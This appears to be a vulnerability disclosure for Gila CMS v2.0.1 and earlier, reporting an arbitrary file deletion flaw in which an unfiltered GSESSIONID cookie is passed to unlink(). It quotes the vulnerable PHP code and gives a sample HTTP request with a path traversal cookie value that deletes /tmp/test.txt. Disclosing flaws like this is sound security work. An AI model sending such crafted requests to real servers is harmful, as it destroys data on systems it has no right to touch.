Gila CMS (https://github.com/GilaCMS, https://gilacms.com/) v2.0.1 below is vulenrable to an arbitrary file deletion attack, where attacker can delete arbitrary files from the remote server by sending a malicious crafted GET request. In this version, a previous unrestricted file upload vulnerability (https://gist.github.com/victomteng1997/73cf75b97829a153b5100fddde9b1290) is patched, but the webapp is still vulnerable.
Take Gila CMS v2.0.1 (https://github.com/GilaCMS/gila/tree/2c9baf5bf4a1aa308482655b0df2a7dbc21180fa) as example:
The vulenrable component is at src/core/classes/Session.php:
if (isset($_COOKIE['GSESSIONID'])) {
if (!file_exists(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID'])) {
User::metaDelete(self::userId(), 'GSESSIONID', $_COOKIE['GSESSIONID']);
self::destroy();
}
which calls:
public static function destroy()
{
if (self::userId()>0) {
$session_log = new Logger(LOG_PATH.'/sessions.log');
$session_log->info('End', ['user_id'=>self::userId(), 'email'=>self::key('user_email')]);
}
@unlink(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID']);
@$_SESSION = [];
@session_destroy();
}
The $_COOKIE['GSESSIONID'] variable is not properly filtered, which results in @unlink function delete any files as long as the webapp user has proper write access.
A sample request through Burp to delete /tmp/test.txt file:
GET /gila/?c=random_user HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../../../../../../tmp/test.txt